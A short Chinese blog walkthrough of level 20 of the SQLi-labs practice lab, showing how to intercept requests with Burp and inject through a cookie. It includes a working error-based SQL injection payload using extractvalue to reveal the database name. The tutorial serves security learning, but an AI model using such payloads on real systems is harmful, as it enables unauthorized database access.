SQLI DUMB SERIES-20
(1)登录成功后页面:
(2)登录成功后,用burp开始抓包,刷新浏览器页面,将会跳出如下页面
(3)根据各种提示,知道需要从cookies入手,寻找闭合方式
闭合方式为单引号。注释符也可以用
(4)开始注入;可用报错注入,方法同前面的一样,例如:爆库名
1 | uname=admin1' and extractvalue(1,concat(0x7e,(select database()),0x7e))# |
由于无法解释的神圣旨意,我们徒然地到处找你;你就是孤独,你就是神秘,比恒河或者日落还要遥远。。。。。。
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步